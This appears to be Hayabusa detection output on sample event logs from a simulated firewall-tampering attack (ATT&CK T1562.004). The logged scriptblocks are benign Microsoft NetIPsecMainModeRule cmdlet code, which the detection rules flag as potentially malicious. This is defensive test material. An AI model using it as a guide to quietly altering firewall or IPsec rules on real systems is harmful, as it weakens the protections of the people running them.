$__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${D",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${D",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"isplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 